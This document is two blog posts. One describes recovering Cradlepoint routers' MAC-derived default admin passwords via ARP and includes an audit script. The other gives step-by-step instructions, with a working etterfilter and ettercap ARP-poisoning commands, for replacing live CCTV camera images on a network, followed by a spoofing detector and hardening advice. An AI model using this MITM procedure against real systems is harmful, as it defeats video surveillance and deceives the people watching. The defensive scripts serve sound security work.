
Sunday, May 31, 2015

Hacking Cradle Point Routers


This post is not related to video surveillance security. Please do not hack any routers. One of my long-distance friends asked me about this, so I am putting it on my blog.


Cradle-point wireless routers are used heavily for setting up small networks. Cradle-point uses MAC-specific authentication credentials, which are unique for every router because every MAC address is unique. Cradle-point chose this behaviour in order to put more entropy into the authentication scheme instead of depending on a single default password, which is what most LAN/WLAN routers use.

By default, Cradle-point uses the last six characters of the MAC address as the password. At first glance this seems more secure. However, it is not appropriate from a security point of view. For the first administrative login and for user authentication, a login page is displayed that asks for the internet access password.

The question is: how do you get the password for an unmanaged router? It is in the MAC address. The obscure part is that once you are inside the WLAN, you already have an IP address, which means the Address Resolution Protocol (ARP), which maps the network layer address (IP) to the link layer address (Ethernet/MAC), is the key. The login page looks as follows.

The designers made a mistake with this layout because, in order to reach the administrative web page, the client has to connect to the network while it is active. Once a user activates the wireless connection, it is connected to the same WLAN, whose gateway address is 192.168.0.1 (the default for Cradle-point routers). It is hilarious, but it is trivial to subvert this and get the password. The hacker is now inside the network, so the ARP entry that resolves the gateway's IP address to the router's MAC address is available (simply ping the gateway).
As per the documentation, the password has to be 071640. Let’s try it.
So, configure your devices in a secure manner.
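A defender's check for the weakness described above, written for this post as an added example (it is not Cradle-point's code or tooling): given an inventory of routers with the MAC address printed on each label and the admin password currently configured, it flags every router whose password is still the last six hex characters of its MAC. The inventory and MAC notations are constructed; the comparison is case-insensitive on the assumption that an auditor wants either case flagged.

```python
import re

# Constructed router inventory for the audit; these are not real devices.
# Each entry is (label, MAC address as printed on the label, configured admin password).
SAMPLE_INVENTORY = [
    ("branch-1", "00:30:44:12:34:56", "123456"),             # still the MAC-derived default
    ("branch-2", "00-30-44-AB-CD-EF", "abcdef"),             # default, other MAC notation
    ("branch-3", "0030.44aa.bb01", "kX7!qPz9-vault-2015"),   # changed to an unrelated password
]


def normalize_mac(mac: str) -> str:
    """Strip separators (':', '-', '.') and return the 12 hex digits in upper case."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if len(digits) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return digits.upper()


def is_mac_derived_default(password: str, mac: str) -> bool:
    """True when the password is the factory default the post describes:
    the last six hex characters of the router's MAC address (case-insensitive)."""
    return password.strip().upper() == normalize_mac(mac)[-6:]


def audit_inventory(inventory):
    """Return the labels of routers whose admin password is still the MAC-derived default."""
    return [label for label, mac, password in inventory
            if is_mac_derived_default(password, mac)]


if __name__ == "__main__":
    for label in audit_inventory(SAMPLE_INVENTORY):
        print(f"{label}: admin password is still the MAC-derived factory default")
```

Run it against your own inventory export; every label it prints is a router whose password anyone on the WLAN can read out of their ARP cache, which is the point of the post.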

Friday, July 26, 2013

Manipulating IP based CCTV Systems

As you are probably aware, CCTV networks provide security to businesses around the world. However, due to insecure and poorly designed networks, network security cameras can be abused and their video streams redirected or modified. I am going to explain how this can be done so you can check your network.

1. Connect to the network wirelessly or penetrate a machine on the LAN.
2. Upload nmap and ettercap onto your machine or the machine on the LAN that you penetrated.
3. Scan the internal network using nmap and look for open ports; in this example we look for cameras.
4. Once you find a camera, run ettercap, scan for hosts and perform the MITM.
5. Watch the traffic and find the IPs of the cameras by sniffing the traffic passing through your machine.
6. Look at the tcp.dst and tcp.src of the packets; these tell you the source and destination ports.
7. Once you find a suitable camera and the client that is watching it, create an etterfilter. One is provided below.

    # Example etterfilter (straight quotes are required; the blog's curly quotes will not compile)
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            # Stop the server from gzipping the reply so the HTML below stays searchable.
            replace("Accept-Encoding", "Accept-Rubbish!");
            # note: replacement string is the same length as the original string
            msg("zapped Accept-Encoding!\n");
        }
    }
    if (ip.proto == TCP && tcp.src == 80) {
        # Inner double quotes inside an etterfilter string must be escaped with a backslash.
        # Replace both placeholders with the real camera picture URL and your own image URL.
        replace("img src=\"CAMERA PICTURE URL HERE\"", "img src=\"YOUR IMAGE URL HERE\"");
        replace("IMG SRC=\"CAMERA PICTURE URL HERE\"", "img src=\"YOUR IMAGE URL HERE\"");
        msg("Filter Ran.\n");
    }

8. Save the file as a filter, for example camera.filter.
9. Compile that source with 'etterfilter camera.filter -o camera.ef'.
10. Now set up ettercap to apply the filter each time the page is viewed across the network: 'ettercap -T -q -F camera.ef -M ARP // //'.
11. In theory, each time the camera is viewed by someone on the network they will now see your image instead of the stream.

This attack has been used in practice, and it can be devastating to any business that depends on network cameras for security. Some businesses connect network cameras directly to the gateway router; if the gateway is penetrated, the cameras are at risk.

Wireless networks can also give attackers a direct connection to your network once the encryption has been broken. Weak wireless encryption and a lack of network monitoring help an attacker stay undetected on the network.

I recommend installing a hardware firewall that detects spoofing attacks between the network cameras and the router/switch, and using network encryption; together these make the environment very difficult for an attacker.
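The spoofing detection recommended above can also be done with a small monitor on the camera segment. The following is an added example written for this post, not a tool from the post's author or from ettercap: it reads ARP replies in the style tcpdump prints them ("ARP, Reply <ip> is-at <mac>") and reports two signals. The first is an IP whose MAC changed during the capture; the second, stronger one is a single MAC answering for several IPs at once, which is exactly what step 10's 'ettercap -M ARP // //' produces when it poisons every host. The log lines, addresses and the gateway IP are constructed.

```python
import re
from collections import defaultdict

# Constructed capture in tcpdump's ARP output style. The first three replies are the legitimate
# gateway and two hosts; the last three show one station answering for every address at once.
SAMPLE_ARP_LOG = """\
12:00:01.000000 ARP, Reply 192.168.0.1 is-at 00:11:22:33:44:55, length 28
12:00:01.500000 ARP, Reply 192.168.0.23 is-at 3c:5a:b4:aa:bb:cc, length 28
12:00:02.000000 ARP, Reply 192.168.0.45 is-at 9c:2e:a1:11:22:33, length 28
12:00:05.000000 ARP, Reply 192.168.0.1 is-at de:ad:be:ef:00:01, length 28
12:00:05.010000 ARP, Reply 192.168.0.23 is-at de:ad:be:ef:00:01, length 28
12:00:05.020000 ARP, Reply 192.168.0.45 is-at de:ad:be:ef:00:01, length 28
"""

ARP_REPLY = re.compile(
    r"ARP, Reply (\d{1,3}(?:\.\d{1,3}){3}) is-at ([0-9a-f]{2}(?::[0-9a-f]{2}){5})", re.I
)


def parse_arp_replies(log):
    """Yield (ip, mac) pairs, MAC lower-cased, for every ARP reply line in the log."""
    for line in log.splitlines():
        m = ARP_REPLY.search(line)
        if m:
            yield m.group(1), m.group(2).lower()


def detect_arp_spoofing(log, gateway_ip):
    """Return findings: IPs whose MAC changed, MACs that claimed several IPs, and whether
    the gateway address was among the ones re-mapped."""
    macs_for_ip = defaultdict(list)   # ip -> MACs seen, in order of first appearance
    ips_for_mac = defaultdict(set)    # mac -> IPs it answered for
    for ip, mac in parse_arp_replies(log):
        if mac not in macs_for_ip[ip]:
            macs_for_ip[ip].append(mac)
        ips_for_mac[mac].add(ip)
    changed = {ip: macs for ip, macs in macs_for_ip.items() if len(macs) > 1}
    multi = {mac: sorted(ips) for mac, ips in ips_for_mac.items() if len(ips) > 1}
    return {
        "changed_ips": changed,
        "multi_ip_macs": multi,
        "gateway_impersonated": gateway_ip in changed,
    }


if __name__ == "__main__":
    findings = detect_arp_spoofing(SAMPLE_ARP_LOG, "192.168.0.1")
    for ip, macs in findings["changed_ips"].items():
        print(f"{ip}: MAC changed {' -> '.join(macs)}")
    for mac, ips in findings["multi_ip_macs"].items():
        print(f"{mac}: answered for {len(ips)} addresses {ips}")
    if findings["gateway_impersonated"]:
        print("gateway address re-mapped: possible ARP MITM")
```

A single MAC change can be legitimate (a replaced switch port, a reissued DHCP lease), so on its own it is a warning; one MAC claiming the gateway and the camera clients in the same few milliseconds is the pattern to alert on, and it is visible to a passive sensor on the camera VLAN without touching the cameras themselves.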